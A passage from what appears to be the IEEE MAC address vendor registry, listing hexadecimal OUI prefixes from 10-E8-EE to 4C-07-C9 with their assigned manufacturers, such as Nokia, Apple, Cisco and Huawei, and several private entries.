10-E8-EE (hex) PhaseSpace 10-EE-D9 (hex) Canoga Perkins Corporation 10-F9-EE (hex) Nokia Corporation 10-FC-54 (hex) Shany Electronic Co., Ltd. 11-00-AA (hex) PRIVATE 14-07-08 (hex) PRIVATE 14-07-E0 (hex) Abrantix AG 14-14-4B (hex) FUJIAN STAR-NET COMMUNICATION CO.,LTD 14-1B-BD (hex) Volex Inc. 14-30-7A (hex) Avermetrics 14-35-B3 (hex) Future Designs, Inc. 14-36-05 (hex) Nokia Corporation 14-37-3B (hex) PROCOM Systems 14-3A-EA (hex) Dynapower Company LLC 14-3E-60 (hex) Alcatel-Lucent 14-49-78 (hex) Digital Control Incorporated 14-4C-1A (hex) Max Communication GmbH 14-54-12 (hex) Entis Co., Ltd. 14-5A-05 (hex) Apple, Inc. 14-63-08 (hex) JABIL CIRCUIT (SHANGHAI) LTD. 14-6E-0A (hex) PRIVATE 14-73-73 (hex) TUBITAK UEKAE 14-74-11 (hex) RIM 14-7D-B3 (hex) JOA TELECOM.CO.,LTD 14-7D-C5 (hex) Murata Manufacturing Co., Ltd. 14-82-5B (hex) Hefei Radio Communication Technology Co., Ltd 14-8A-70 (hex) ADS GmbH 14-8F-C6 (hex) Apple Inc 14-90-90 (hex) KongTop industrial(shen zhen)CO.,LTD 14-A6-2C (hex) S.M. Dezac S.A. 14-A8-6B (hex) ShenZhen Telacom Science&Technology Co., Ltd 14-A9-E3 (hex) MST CORPORATION 14-B7-3D (hex) ARCHEAN Technologies 14-C2-1D (hex) Sabtech Industries 14-D4-FE (hex) Pace plc 14-D6-4D (hex) D-Link International 14-D7-6E (hex) CONCH ELECTRONIC Co.,Ltd 14-DA-E9 (hex) ASUSTek COMPUTER INC. 14-E4-EC (hex) mLogic LLC 14-EB-33 (hex) BSMediasoft Co., Ltd. 14-EE-9D (hex) AirNav Systems LLC 14-F0-C5 (hex) Xtremio Ltd. 14-FE-AF (hex) SAGITTAR LIMITED 14-FE-B5 (hex) Dell Inc 18-01-E3 (hex) Elektrobit Wireless Communications Ltd 18-03-73 (hex) Dell Inc 18-03-FA (hex) IBT Interfaces 18-06-75 (hex) DILAX Intelcom GmbH 18-0B-52 (hex) Nanotron Technologies GmbH 18-0C-77 (hex) Westinghouse Electric Company, LLC 18-14-20 (hex) TEB SAS 18-14-56 (hex) Nokia Corporation 18-17-14 (hex) DAEWOOIS 18-20-32 (hex) Apple, Inc. 18-28-61 (hex) AirTies Wireless Networks 18-2B-05 (hex) 8D Technologies 18-2C-91 (hex) Concept Development, Inc. 18-38-25 (hex) Wuhan Lingjiu High-tech Co.,Ltd. 18-3B-D2 (hex) BYD Precision Manufacture Company Ltd. 18-3D-A2 (hex) Intel Corporate 18-42-2F (hex) Alcatel Lucent 18-46-17 (hex) Samsung Electronics 18-4E-94 (hex) MESSOA TECHNOLOGIES INC. 18-59-33 (hex) Cisco SPVTG 18-66-E3 (hex) Veros Systems, Inc. 18-67-51 (hex) KOMEG Industrielle Messtechnik GmbH 18-6D-99 (hex) Adanis Inc. 18-7C-81 (hex) Valeo Vision Systems 18-80-CE (hex) Barberry Solutions Ltd 18-80-F5 (hex) Alcatel-Lucent Shanghai Bell Co., Ltd 18-86-AC (hex) Nokia Danmark A/S 18-87-96 (hex) HTC Corporation 18-8E-D5 (hex) Philips Innovative Application NV 18-92-2C (hex) Virtual Instruments 18-97-FF (hex) TechFaith Wireless Technology Limited 18-A9-05 (hex) Hewlett-Packard Company 18-AB-F5 (hex) Ultra Electronics - Electrics 18-AD-4D (hex) Polostar Technology Corporation 18-AE-BB (hex) Siemens Programm- und Systementwicklung GmbH&Co.KG 18-AF-9F (hex) DIGITRONIC Automationsanlagen GmbH 18-B2-09 (hex) Torrey Pines Logic, Inc 18-B3-BA (hex) Netlogic AB 18-B4-30 (hex) Nest Labs Inc. 18-B7-9E (hex) Invoxia 18-C0-86 (hex) Broadcom Corporation 18-C4-51 (hex) Tucson Embedded Systems 18-D0-71 (hex) DASAN SMC, Inc. 18-E2-88 (hex) STT Condigi 18-E7-F4 (hex) Apple 18-E8-0F (hex) Viking Electronics Inc. 18-EF-63 (hex) Cisco Systems 18-F4-6A (hex) Hon Hai Precision Ind. Co.,Ltd. 18-F6-50 (hex) Multimedia Pacific Limited 18-FC-9F (hex) Changhe Electronics Co., Ltd. 1C-06-56 (hex) IDY Corporation 1C-0F-CF (hex) Sypro Optics GmbH 1C-12-9D (hex) IEEE PES PSRC/SUB 1C-14-48 (hex) Motorola Mobility, Inc. 1C-17-D3 (hex) Cisco Systems 1C-18-4A (hex) ShenZhen RicherLink Technologies Co.,LTD 1C-19-DE (hex) eyevis GmbH 1C-1D-67 (hex) Huawei Device Co., Ltd 1C-33-4D (hex) ITS Telecom 1C-35-F1 (hex) NEW Lift Neue Elektronische Wege Steuerungsbau GmbH 1C-3A-4F (hex) AccuSpec Electronics, LLC 1C-3D-E7 (hex) Sigma Koki Co.,Ltd. 1C-45-93 (hex) Texas Instruments 1C-4B-D6 (hex) AzureWave 1C-5C-55 (hex) PRIMA Cinema, Inc 1C-65-9D (hex) Liteon Technology Corporation 1C-6F-65 (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 1C-75-08 (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD. 1C-7C-11 (hex) EID 1C-7E-E5 (hex) D-Link International 1C-83-B0 (hex) Linked IP GmbH 1C-8E-8E (hex) DB Communication & Systems Co., ltd. 1C-8F-8A (hex) Phase Motion Control SpA 1C-95-5D (hex) I-LAX ELECTRONICS INC. 1C-AA-07 (hex) Cisco Systems 1C-AF-F7 (hex) D-LINK INTERNATIONAL PTE LIMITED 1C-B1-7F (hex) NEC AccessTechnica, Ltd. 1C-BB-A8 (hex) OJSC "Ufimskiy Zavod "Promsvyaz" 1C-BD-0E (hex) Amplified Engineering Pty Ltd 1C-BD-B9 (hex) D-LINK INTERNATIONAL PTE LIMITED 1C-C1-DE (hex) Hewlett-Packard Company 1C-DF-0F (hex) Cisco Systems 1C-E1-92 (hex) Qisda Corporation 1C-E2-CC (hex) Texas Instruments 1C-F0-61 (hex) SCAPS GmbH 1C-F5-E7 (hex) Turtle Industry Co., Ltd. 1C-FE-A7 (hex) IDentytech Solutins Ltd. 20-05-E8 (hex) OOO "InProMedia" 20-0A-5E (hex) Xiangshan Giant Eagle Technology Developing co.,LTD 20-10-7A (hex) Gemtek Technology Co., Ltd. 20-12-57 (hex) Most Lucky Trading Ltd 20-13-E0 (hex) Samsung Electronics Co.,Ltd 20-21-A5 (hex) LG Electronics Inc 20-2B-C1 (hex) Huawei Device Co., Ltd 20-2C-B7 (hex) Kong Yue Electronics & Information Industry (Xinhui) Ltd. 20-37-06 (hex) Cisco Systems 20-37-BC (hex) Kuipers Electronic Engineering BV 20-40-05 (hex) feno GmbH 20-41-5A (hex) Smarteh d.o.o. 20-46-A1 (hex) VECOW Co., Ltd 20-46-F9 (hex) Advanced Network Devices (dba:AND) 20-4A-AA (hex) Hanscan Spain S.A. 20-4E-6B (hex) Axxana(israel) ltd 20-4E-7F (hex) NETGEAR 20-59-A0 (hex) Paragon Technologies Inc. 20-5B-2A (hex) PRIVATE 20-5B-5E (hex) Shenzhen Wonhe Technology Co., Ltd 20-6A-8A (hex) Wistron InfoComm Manufacturing(Kunshan)Co.,Ltd. 20-6A-FF (hex) Atlas Elektronik UK Limited 20-6F-EC (hex) Braemac CA LLC 20-76-00 (hex) Actiontec Electronics, Inc 20-7C-8F (hex) Quanta Microsystems,Inc. 20-A2-E7 (hex) Lee-Dickens Ltd 20-AA-25 (hex) IP-NET LLC 20-AA-4B (hex) Cisco-Linksys, LLC 20-B0-F7 (hex) Enclustra GmbH 20-B3-99 (hex) Enterasys 20-B7-C0 (hex) Omicron electronics GmbH 20-BB-C6 (hex) Jabil Circuit Hungary Ltd. 20-BF-DB (hex) DVL 20-C8-B3 (hex) SHENZHEN BUL-TECH CO.,LTD. 20-CF-30 (hex) ASUSTek COMPUTER INC. 20-D5-AB (hex) Korea Infocom Co.,Ltd. 20-D6-07 (hex) Nokia Corporation 20-D9-06 (hex) Iota, Inc. 20-EE-C6 (hex) Elefirst Science & Tech Co ., ltd 20-F3-A3 (hex) Huawei Technologies Co., Ltd 20-FD-F1 (hex) 3COM EUROPE LTD 20-FE-CD (hex) System In Frontier Inc. 20-FE-DB (hex) M2M Solution S.A.S. 24-0B-2A (hex) Viettel Group 24-0B-B1 (hex) KOSTAL Industrie Elektrik GmbH 24-1A-8C (hex) Squarehead Technology AS 24-1F-2C (hex) Calsys, Inc. 24-21-AB (hex) Sony Ericsson Mobile Communications 24-37-4C (hex) Cisco SPVTG 24-37-EF (hex) EMC Electronic Media Communication SA 24-3C-20 (hex) Dynamode Group 24-45-97 (hex) GEMUE Gebr. Mueller Apparatebau 24-47-0E (hex) PentronicAB 24-49-7B (hex) Innovative Converged Devices Inc 24-5F-DF (hex) KYOCERA Corporation 24-77-03 (hex) Intel Corporate 24-82-8A (hex) Prowave Technologies Ltd. 24-86-F4 (hex) Ctek, Inc. 24-87-07 (hex) SEnergy Corporation 24-94-42 (hex) OPEN ROAD SOLUTIONS , INC. 24-A4-2C (hex) KOUKAAM a.s. 24-A9-37 (hex) PURE Storage 24-AB-81 (hex) Apple, Inc. 24-AF-4A (hex) Alcatel-Lucent-IPD 24-AF-54 (hex) NEXGEN Mediatech Inc. 24-B6-57 (hex) Cisco Systems 24-B6-B8 (hex) FRIEM SPA 24-B6-FD (hex) Dell Inc 24-B8-8C (hex) Crenus Co.,Ltd. 24-B8-D2 (hex) Opzoon Technology Co.,Ltd. 24-BA-30 (hex) Technical Consumer Products, Inc. 24-BB-C1 (hex) Absolute Analysis 24-BC-82 (hex) Dali Wireless, Inc. 24-BF-74 (hex) PRIVATE 24-C0-B3 (hex) RSF 24-C8-6E (hex) Chaney Instrument Co. 24-C9-DE (hex) Genoray 24-CB-E7 (hex) MYK, Inc. 4-60-30-108, Kamoi, 24-CF-21 (hex) Shenzhen State Micro Technology Co., Ltd 24-D2-CC (hex) SmartDrive Systems Inc. 24-DA-B6 (hex) Sistemas de Gestión Energética S.A. de C.V. 24-DB-AC (hex) Huawei Device Co., Ltd 24-DB-AD (hex) ShopperTrak RCT Corporation 24-E6-BA (hex) JSC Zavod im. Kozitsky 24-EC-99 (hex) Askey Computer Corp 24-F0-FF (hex) GHT Co., Ltd. 28-04-E0 (hex) FERMAX ELECTRONICA S.A.U. 28-06-1E (hex) NINGBO GLOBAL USEFUL ELECTRIC CO.,LTD 28-06-8D (hex) ITL, LLC 28-0C-B8 (hex) Mikrosay Yazilim ve Elektronik A.S. 28-0D-FC (hex) Sony Computer Entertainment Inc. 28-14-71 (hex) Lantis co., LTD. 28-16-2E (hex) 2Wire 28-18-FD (hex) Aditya Infotech Ltd. 28-26-A6 (hex) PBR electronics GmbH 28-34-10 (hex) Enigma Diagnostics Limited 28-37-37 (hex) Apple, Inc. 28-38-CF (hex) Gen2wave 28-39-E7 (hex) Preceno Technology Pte.Ltd. 28-3C-E4 (hex) Huawei Technologies Co., Ltd 28-40-1A (hex) C8 MediSensors, Inc. 28-48-46 (hex) GridCentric Inc. 28-4C-53 (hex) Intune Networks 28-51-32 (hex) Shenzhen Prayfly Technology Co.,Ltd 28-5F-DB (hex) Huawei Device Co., Ltd 28-60-46 (hex) Lantech Communications Global, Inc. 28-6A-B8 (hex) Apple Inc 28-6A-BA (hex) IEEE-SA 28-6E-D4 (hex) HUAWEI TECHNOLOGIES CO.,LTD 28-72-C5 (hex) Smartmatic Corp 28-72-F0 (hex) ATHENA 28-85-2D (hex) Touch Networks 28-89-15 (hex) CashGuard Sverige AB 28-93-FE (hex) Cisco Systems 28-94-0F (hex) Cisco Systems 28-A5-74 (hex) Miller Electric Mfg. Co. 28-AF-0A (hex) Sirius XM Radio Inc 28-B0-CC (hex) Xenya d.o.o. 28-BE-9B (hex) Technicolor USA Inc. 28-C0-DA (hex) Juniper Networks 28-C7-18 (hex) Altierre 28-CC-FF (hex) Corporacion Empresarial Altra SL 28-CD-1C (hex) Espotel Oy 28-CD-4C (hex) Individual Computers GmbH 28-CF-DA (hex) Apple Inc 28-D1-AF (hex) Nokia Corporation 28-D5-76 (hex) Premier Wireless, Inc. 28-D9-97 (hex) Yuduan Mobile Co., Ltd. 28-E0-2C (hex) Apple, Inc. 28-E2-97 (hex) Shanghai InfoTM Microelectronics Co.,Ltd. 28-E7-94 (hex) Microtime Computer Inc. 28-E7-CF (hex) Apple, Inc. 28-ED-58 (hex) JAG Jakob AG 28-EE-2C (hex) Frontline Test Equipment 28-EF-01 (hex) PRIVATE 28-F3-58 (hex) 2C - Trifonov & Co 28-FB-D3 (hex) Shanghai RagenTek Communication Technology Co.,Ltd. 2C-00-2C (hex) UNOWHY 2C-00-33 (hex) EControls, LLC 2C-06-23 (hex) Win Leader Inc. 2C-10-C1 (hex) Nintendo Co., Ltd. 2C-19-84 (hex) IDN Telecom, Inc. 2C-1E-EA (hex) AERODEV 2C-21-72 (hex) Juniper Networks 2C-27-D7 (hex) Hewlett-Packard Company 2C-30-68 (hex) Pantech Co.,Ltd 2C-34-27 (hex) ERCO & GENER 2C-36-A0 (hex) Capisco Limited 2C-3A-28 (hex) Fagor Electrónica 2C-3F-38 (hex) Cisco Systems 2C-3F-3E (hex) Alge-Timing GmbH 2C-41-38 (hex) Hewlett-Packard Company 2C-44-01 (hex) Samsung Electronics Co.,Ltd 2C-67-FB (hex) ShenZhen Zhengjili Electronics Co., LTD 2C-6B-F5 (hex) Juniper networks 2C-76-8A (hex) Hewlett-Packard Company 2C-7A-FE (hex) IEE&E "Black" ops 2C-7E-CF (hex) Onzo Ltd 2C-80-65 (hex) HARTING Inc. of North America 2C-81-58 (hex) Hon Hai Precision Ind. Co.,Ltd 2C-8B-F2 (hex) Hitachi Metals America Ltd 2C-91-27 (hex) Eintechno Corporation 2C-97-17 (hex) I.C.Y. B.V. 2C-9E-5F (hex) Motorola Mobility, Inc. 2C-9E-FC (hex) CANON INC. 2C-A1-57 (hex) ACROMATE, INC. 2C-A7-80 (hex) True Technologies Inc. 2C-A8-35 (hex) RIM 2C-B0-5D (hex) NETGEAR 2C-B0-DF (hex) Soliton Technologies Pvt Ltd 2C-B6-9D (hex) RED Digital Cinema 2C-CD-27 (hex) Precor Inc 2C-CD-43 (hex) Summit Technology Group 2C-D1-DA (hex) Sanjole, Inc. 2C-D2-E7 (hex) Nokia Corporation 2C-DD-0C (hex) Discovergy GmbH 2C-EE-26 (hex) Petroleum Geo-Services 2C-F4-C5 (hex) Avaya Inc 30-0B-9C (hex) Delta Mobile Systems, Inc. 30-14-2D (hex) Piciorgros GmbH 30-14-4A (hex) Wistron Neweb Corp. 30-16-8D (hex) ProLon 30-17-C8 (hex) Sony Ericsson Mobile Communications AB 30-18-CF (hex) DEOS control systems GmbH 30-1A-28 (hex) Mako Networks Ltd 30-2D-E8 (hex) JDA, LLC (JDA Systems) 30-32-D4 (hex) Hanilstm Co., Ltd. 30-37-A6 (hex) Cisco Systems 30-38-55 (hex) Nokia Corporation 30-39-55 (hex) Shenzhen Jinhengjia Electronic Co., Ltd. 30-39-F2 (hex) PIRELLI BROADBAND SOLUTIONS 30-41-74 (hex) ALTEC LANSING LLC 30-46-9A (hex) NETGEAR 30-49-3B (hex) Nanjing Z-Com Wireless Co.,Ltd 30-4C-7E (hex) Panasonic Electric Works Automation Controls Techno Co.,Ltd. 30-4E-C3 (hex) Tianjin Techua Technology Co., Ltd. 30-52-5A (hex) NST Co., LTD 30-55-ED (hex) Trex Network LLC 30-57-AC (hex) IRLAB LTD. 30-61-18 (hex) Paradom Inc. 30-68-8C (hex) Reach Technology Inc. 30-69-4B (hex) RIM 30-6C-BE (hex) Skymotion Technology (HK) Limited 30-6E-5C (hex) Validus Technologies 30-71-B2 (hex) Hangzhou Prevail Optoelectronic Equipment Co.,LTD. 30-7C-30 (hex) RIM 30-7E-CB (hex) SFR 30-87-30 (hex) Huawei Device Co., Ltd 30-8C-FB (hex) Dropcam 30-B3-A2 (hex) Shenzhen Heguang Measurement & Control Technology Co.,Ltd 30-DE-86 (hex) Cedac Software S.r.l. 30-E4-8E (hex) Vodafone UK 30-E4-DB (hex) Cisco Systems 30-EB-25 (hex) INTEK DIGITAL 30-EF-D1 (hex) Alstom Strongwish (Shenzhen) Co., Ltd. 30-F9-ED (hex) Sony Corporation 34-08-04 (hex) D-Link Corporation 34-15-9E (hex) Apple, Inc 34-21-09 (hex) Jensen Scandinavia AS 34-25-5D (hex) Shenzhen Loadcom Technology Co.,Ltd 34-29-EA (hex) MCD ELECTRONICS SP. Z O.O. 34-40-B5 (hex) IBM 34-4B-50 (hex) ZTE Corporation 34-4F-69 (hex) EKINOPS SAS 34-51-C9 (hex) Apple Inc 34-5B-11 (hex) EVI HEAT AB 34-68-4A (hex) Teraworks Co., Ltd. 34-6F-92 (hex) White Rodgers Division 34-78-77 (hex) O-NET Communications(Shenzhen) Limited 34-7E-39 (hex) Nokia Danmark A/S 34-82-DE (hex) Kayo Technology, Inc. 34-83-02 (hex) iForcom Co., Ltd 34-86-2A (hex) Heinz Lackmann GmbH & Co KG 34-97-FB (hex) ADVANCED RF TECHNOLOGIES INC 34-99-D7 (hex) Universal Flow Monitors, Inc. 34-9A-0D (hex) ZBD Displays Ltd 34-A1-83 (hex) AWare, Inc 34-A5-5D (hex) TECHNOSOFT INTERNATIONAL SRL 34-A7-09 (hex) Trevil srl 34-AA-99 (hex) Alcatel-Lucent 34-AA-EE (hex) Mikrovisatos Servisas UAB 34-B5-71 (hex) PLDS 34-BA-51 (hex) Se-Kure Controls, Inc. 34-BA-9A (hex) Asiatelco Technologies Co. 34-BC-A6 (hex) Beijing Ding Qing Technology, Ltd. 34-BD-F9 (hex) Shanghai WDK Industrial Co.,Ltd. 34-C3-AC (hex) Samsung Electronics 34-C6-9A (hex) Enecsys Ltd 34-C7-31 (hex) ALPS Electric Co,. Ltd. 34-CE-94 (hex) Parsec (Pty) Ltd 34-D0-9B (hex) MobilMAX Technology Inc. 34-D2-C4 (hex) RENA GmbH Print Systeme 34-DF-2A (hex) Fujikon Industrial Co.,Limited 34-E0-D7 (hex) DONGGUAN QISHENG ELECTRONICS INDUSTRIAL CO., LTD 34-EF-44 (hex) 2Wire 34-EF-8B (hex) NTT Communications Corporation 34-F3-9B (hex) WizLAN Ltd. 34-F9-68 (hex) ATEK Products, LLC 38-01-97 (hex) Toshiba Samsung Storage Technolgoy Korea Corporation 38-0A-0A (hex) Sky-City Communication and Electronics Limited Company 38-0D-D4 (hex) Primax Electronics LTD. 38-16-D1 (hex) Samsung Electronics Co.,Ltd 38-22-9D (hex) PIRELLI BROADBAND SOLUTIONS 38-22-D6 (hex) H3C Technologies Co., Limited 38-26-CD (hex) ANDTEK 38-28-EA (hex) Fujian Netcom Technology Co., LTD 38-31-AC (hex) WEG 38-46-08 (hex) ZTE Corporation 38-52-1A (hex) Alcatel-Lucent 7705 38-58-0C (hex) Panaccess Systems GmbH 38-59-F9 (hex) Hon Hai Precision Ind. Co.,Ltd. 38-5F-C3 (hex) Yu Jeong System, Co.Ltd 38-60-77 (hex) PEGATRON CORPORATION 38-63-F6 (hex) 3NOD MULTIMEDIA(SHENZHEN)CO.,LTD 38-6E-21 (hex) Wasion Group Ltd. 38-72-C0 (hex) COMTREND 38-83-45 (hex) TP-LINK TECHNOLOGIES CO., LTD. 38-91-FB (hex) Xenox Holding BV 38-95-92 (hex) Beijing Tendyron Corporation 38-9F-83 (hex) OTN Systems N.V. 38-A8-51 (hex) Quickset International Inc 38-A9-5F (hex) Actifio Inc 38-BB-23 (hex) OzVision America LLC 38-C7-BA (hex) CS Services Co.,Ltd. 38-C8-5C (hex) Cisco SPVTG 38-D1-35 (hex) EasyIO Corporation Sdn. Bhd. 38-DE-60 (hex) Mohlenhoff GmbH 38-E7-D8 (hex) HTC Corporation 38-E8-DF (hex) b gmbh medien + datenbanken 38-E9-8C (hex) Reco S.p.A. 38-EC-E4 (hex) Samsung Electronics 38-FE-C5 (hex) Ellips B.V. 3C-02-B1 (hex) Creation Technologies LP 3C-04-BF (hex) PRAVIS SYSTEMS Co.Ltd., 3C-05-AB (hex) Product Creation Studio 3C-07-54 (hex) Apple Inc 3C-09-6D (hex) Powerhouse Dynamics 3C-0F-C1 (hex) KBC Networks 3C-10-6F (hex) ALBAHITH TECHNOLOGIES 3C-19-15 (hex) GFI Chrono Time 3C-19-7D (hex) Ericsson AB 3C-1A-79 (hex) Huayuan Technology CO.,LTD 3C-1C-BE (hex) JADAK LLC 3C-26-D5 (hex) Sotera Wireless 3C-27-63 (hex) SLE quality engineering GmbH & Co. KG 3C-2D-B7 (hex) Texas Instruments 3C-2F-3A (hex) SFORZATO Corp. 3C-39-C3 (hex) JW Electronics Co., Ltd. 3C-43-8E (hex) Motorola Mobility, Inc. 3C-4A-92 (hex) Hewlett-Packard Company 3C-4C-69 (hex) Infinity System S.L. 3C-5A-37 (hex) Samsung Electronics 3C-5F-01 (hex) Synerchip Co., Ltd. 3C-62-00 (hex) Samsung electronics CO., LTD 3C-62-78 (hex) SHENZHEN JETNET TECHNOLOGY CO.,LTD. 3C-67-2C (hex) Sciovid Inc. 3C-6A-7D (hex) Niigata Power Systems Co., Ltd. 3C-6F-45 (hex) Fiberpro Inc. 3C-70-59 (hex) MakerBot Industries 3C-74-37 (hex) RIM 3C-75-4A (hex) Motorola Mobility, Inc. 3C-7D-B1 (hex) Texas Instruments 3C-8B-FE (hex) Samsung Electronics 3C-91-57 (hex) Hangzhou Yulong Conmunication Co.,Ltd 3C-99-F7 (hex) Lansentechnology AB 3C-A7-2B (hex) MRV Communications (Networks) LTD 3C-B1-5B (hex) Avaya, Inc 3C-B1-7F (hex) Wattwatchers Pty Ld 3C-BD-D8 (hex) LG ELECTRONICS INC 3C-C0-C6 (hex) d&b audiotechnik GmbH 3C-C9-9E (hex) Huiyang Technology Co., Ltd 3C-D0-F8 (hex) Apple, Inc. 3C-D1-6E (hex) Telepower Communication Co., Ltd 3C-D9-2B (hex) Hewlett-Packard Company 3C-DF-1E (hex) Cisco Systems 3C-E5-A6 (hex) Hangzhou H3C Technologies Co., Ltd. 3C-E5-B4 (hex) KIDASEN INDUSTRIA E COMERCIO DE ANTENAS LTDA 3C-E6-24 (hex) LG Display 3C-EA-4F (hex) 2Wire 3C-F5-2C (hex) DSPECIALISTS GmbH 3C-F7-2A (hex) Nokia Corporation 40-01-C6 (hex) 3COM EUROPE LTD 40-04-0C (hex) A&T 40-12-E4 (hex) Compass-EOS 40-13-D9 (hex) Global ES 40-15-97 (hex) Protect America, Inc. 40-16-9F (hex) TP-LINK TECHNOLOGIES CO., LTD. 40-18-D7 (hex) Wyle Telemetry and Data Systems 40-1D-59 (hex) Biometric Associates, LP 40-22-ED (hex) Digital Projection Ltd 40-25-C2 (hex) Intel Corporate 40-2B-A1 (hex) Sony Ericsson Mobile Communications AB 40-2C-F4 (hex) Universal Global Scientific Industrial Co., Ltd. 40-30-04 (hex) Apple, Inc. 40-37-AD (hex) Macro Image Technology, Inc. 40-3C-FC (hex) Apple Inc 40-40-22 (hex) ZIV 40-40-6B (hex) Icomera 40-4A-03 (hex) ZyXEL Communications Corporation 40-4D-8E (hex) Huawei Device Co., Ltd 40-50-E0 (hex) Milton Security Group LLC 40-52-0D (hex) Pico Technology 40-55-39 (hex) Cisco Systems 40-5A-9B (hex) ANOVO 40-5F-BE (hex) RIM 40-5F-C2 (hex) Texas Instruments 40-61-86 (hex) MICRO-STAR INT'L CO.,LTD 40-61-8E (hex) Stella-Green Co 40-66-7A (hex) mediola - connected living AG 40-6A-AB (hex) RIM 40-6C-8F (hex) Apple, Inc. 40-7B-1B (hex) Mettle Networks Inc. 40-83-DE (hex) Motorola 40-84-93 (hex) Clavister AB 40-8A-9A (hex) TITENG CO., Ltd. 40-8B-F6 (hex) Shenzhen TCL New Technology Co; Ltd. 40-95-58 (hex) Aisino Corporation 40-97-D1 (hex) BK Electronics cc 40-98-4C (hex) Casacom Solutions AG 40-98-4E (hex) Texas Instruments 40-98-7B (hex) Aisino Corporation 40-9F-C7 (hex) BAEKCHUN ENC Co., Ltd. 40-A6-A4 (hex) PassivSystems Ltd 40-A6-D9 (hex) Apple 40-B2-C8 (hex) Nortel Networks 40-B3-FC (hex) Logital Co. Limited 40-B7-F3 (hex) Motorola Mobility, Inc. 40-BA-61 (hex) Arima Communications Corp. 40-BC-8B (hex) itelio GmbH 40-BF-17 (hex) Digistar Telecom. SA 40-C2-45 (hex) Shenzhen Hexicom Technology Co., Ltd. 40-C7-C9 (hex) Naviit Inc. 40-CD-3A (hex) Z3 Technology 40-D3-2D (hex) Apple, Inc 40-D4-0E (hex) Biodata Ltd 40-D5-59 (hex) MICRO S.E.R.I. 40-E7-93 (hex) Shenzhen Siviton Technology Co.,Ltd 40-EC-F8 (hex) Siemens AG 40-EF-4C (hex) Fihonest communication co.,Ltd 40-F1-4C (hex) ISE Europe SPRL 40-F4-07 (hex) Nintendo Co., Ltd. 40-F4-EC (hex) Cisco Systems 40-F5-2E (hex) Leica Microsystems (Schweiz) AG 40-FC-89 (hex) Motorola Mobility, Inc. 44-1E-A1 (hex) Hewlett-Packard Company 44-25-BB (hex) Bamboo Entertainment Corporation 44-2A-60 (hex) Apple, Inc. 44-32-2A (hex) Avaya Inc 44-37-19 (hex) 2 Save Energy Ltd 44-37-6F (hex) Young Electric Sign Co 44-37-E6 (hex) Hon Hai Precision Ind.Co.Ltd 44-3D-21 (hex) Nuvolt 44-3E-B2 (hex) DEOTRON Co., LTD. 44-4E-1A (hex) Samsung Electronics Co.,Ltd 44-4F-5E (hex) Pan Studios Co.,Ltd. 44-51-DB (hex) Raytheon BBN Technologies 44-54-C0 (hex) Thompson Aerospace 44-56-8D (hex) PNC Technologies Co., Ltd. 44-56-B7 (hex) Spawn Labs, Inc 44-58-29 (hex) Cisco SPVTG 44-59-9F (hex) Criticare Systems, Inc 44-5E-F3 (hex) Tonalite Holding B.V. 44-61-32 (hex) ecobee inc 44-68-AB (hex) JUIN COMPANY, LIMITED 44-6C-24 (hex) Reallin Electronic Co.,Ltd 44-7C-7F (hex) Innolight Technology Corporation 44-7D-A5 (hex) VTION INFORMATION TECHNOLOGY (FUJIAN) CO.,LTD 44-7E-95 (hex) Alpha and Omega, Inc 44-83-12 (hex) Star-Net 44-85-00 (hex) Intel Corporation 44-87-FC (hex) ELITEGROUP COMPUTER SYSTEM CO., LTD. 44-8C-52 (hex) KTIS CO., Ltd 44-8E-12 (hex) DT Research, Inc. 44-8E-81 (hex) VIG 44-91-DB (hex) Shanghai Huaqin Telecom Technology Co.,Ltd 44-9C-B5 (hex) Alcomp, Inc 44-A4-2D (hex) TCT Mobile Limited 44-A6-89 (hex) PROMAX ELECTRONICA SA 44-A7-CF (hex) Murata Manufacturing Co., Ltd. 44-A8-C2 (hex) SEWOO TECH CO., LTD 44-AA-27 (hex) udworks Co., Ltd. 44-AA-E8 (hex) Nanotec Electronic GmbH & Co. KG 44-C1-5C (hex) Texas Instruments 44-C2-33 (hex) Guangzhou Comet Technology Development Co.Ltd 44-C9-A2 (hex) Greenwald Industries 44-D2-CA (hex) Anvia TV Oy 44-D3-CA (hex) Cisco Systems 44-D6-3D (hex) Talari Networks 44-D8-32 (hex) Azurewave Technologies, Inc. 44-DC-91 (hex) PLANEX COMMUNICATIONS INC. 44-DC-CB (hex) SEMINDIA SYSTEMS PVT LTD 44-E0-8E (hex) Cisco SPVTG 44-E4-9A (hex) OMNITRONICS PTY LTD 44-E4-D9 (hex) Cisco Systems 44-ED-57 (hex) Longicorn, inc. 44-F4-59 (hex) Samsung Electronics 48-02-2A (hex) B-Link Electronic Limited 48-12-49 (hex) Luxcom Technologies Inc. 48-13-F3 (hex) BBK Electronics Corp., Ltd. 48-17-4C (hex) MicroPower technologies 48-1B-D2 (hex) Intron Scientific co., ltd. 48-2C-EA (hex) Motorola Inc Business Light Radios 48-33-DD (hex) ZENNIO AVANCE Y TECNOLOGIA, S.L. 48-34-3D (hex) IEP GmbH 48-44-87 (hex) Cisco SPVTG 48-5B-39 (hex) ASUSTek COMPUTER INC. 48-5D-60 (hex) Azurewave Technologies, Inc. 48-60-BC (hex) Apple Inc 48-61-A3 (hex) Concern "Axion" JSC 48-6B-91 (hex) Fleetwood Group Inc. 48-6F-D2 (hex) StorSimple Inc 48-71-19 (hex) SGB GROUP LTD. 48-8E-42 (hex) DIGALOG GmbH 48-91-F6 (hex) Shenzhen Reach software technology CO.,LTD 48-9B-E2 (hex) SCI Innovations Ltd 48-A2-2D (hex) Shenzhen Huaxuchang Telecom Technology Co.,Ltd 48-A6-D2 (hex) GJsun Optical Science and Tech Co.,Ltd. 48-AA-5D (hex) Store Electronic Systems 48-C1-AC (hex) PLANTRONICS, INC. 48-C8-62 (hex) Simo Wireless,Inc. 48-C8-B6 (hex) SysTec GmbH 48-CB-6E (hex) Cello Electronics (UK) Ltd 48-D5-4C (hex) Jeda Networks 48-D8-FE (hex) ClarIDy Solutions, Inc. 48-DC-FB (hex) Nokia Corporation 48-DF-1C (hex) Wuhan NEC Fibre Optic Communications industry Co. Ltd 48-E1-AF (hex) Vity 48-EB-30 (hex) ETERNA TECHNOLOGY, INC. 48-ED-80 (hex) daesung eltec 48-F3-17 (hex) PRIVATE 48-F4-7D (hex) TechVision Holding Internation Limited 48-F7-F1 (hex) Alcatel-Lucent 48-F8-E1 (hex) Alcatel Lucent WT 48-FC-B8 (hex) Woodstream Corporation 4C-02-2E (hex) CMR KOREA CO., LTD 4C-02-89 (hex) LEX COMPUTECH CO., LTD 4C-07-C9 (hex) COMPUTER OFFICE Co.,Ltd. 